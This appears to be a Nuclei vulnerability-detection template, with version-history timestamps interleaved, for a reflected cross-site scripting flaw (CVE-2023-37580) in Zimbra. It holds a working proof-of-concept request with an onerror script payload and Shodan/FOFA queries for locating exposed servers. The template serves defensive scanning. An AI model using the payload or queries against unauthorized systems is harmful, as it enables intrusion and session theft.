nuclei-templates/http/cves/2023/CVE-2023-37580.yaml

66 lines
2.3 KiB
YAML
Raw Permalink Normal View History

id: CVE-2023-37580
info:
name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:43:37 +00:00
remediation: |
2023-09-06 11:59:08 +00:00
Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS).
reference:
- https://github.com/Zimbra/zm-web-client/pull/827
- https://blog.zimbra.com/2023/07/security-update-for-zimbra-collaboration-suite-version-8-8-15/
- https://nvd.nist.gov/vuln/detail/CVE-2023-37580
2023-08-31 11:46:18 +00:00
- https://wiki.zimbra.com/wiki/Security_Center
- https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy
classification:
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-37580
2023-08-31 11:46:18 +00:00
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.30867
epss-percentile: 0.96974
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:zimbra:zimbra:*:*:*:*:*:*:*:*
metadata:
max-request: 2
2023-08-31 11:46:18 +00:00
vendor: zimbra
product: zimbra
shodan-query:
- http.favicon.hash:475145467
- http.favicon.hash:"475145467"
2023-09-06 11:43:37 +00:00
fofa-query: icon_hash="475145467"
2024-01-14 09:21:50 +00:00
tags: cve2023,cve,zimbra,xss,authenticated,kev
http:
- raw:
- |
POST /zimbra/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginOp=login&username={{username}}&password={{password}}&client=mobile
- |
2023-08-01 05:58:24 +00:00
GET /m/momoveto?st="><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
2023-08-01 05:58:24 +00:00
- '<img src=x onerror=alert(document.domain)>'
- 'id="zMoveForm"'
condition: and
- type: word
part: header_2
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022048e3c2c16faae78f075fb3316202679a06f3ca15d9e665cf8b6865292449a1200221009e80beed07909007baf52bc9724dcc11c5b3700428afd7875003fa9b6fb5ce67:922c64590222798bb761d5b6d8e72950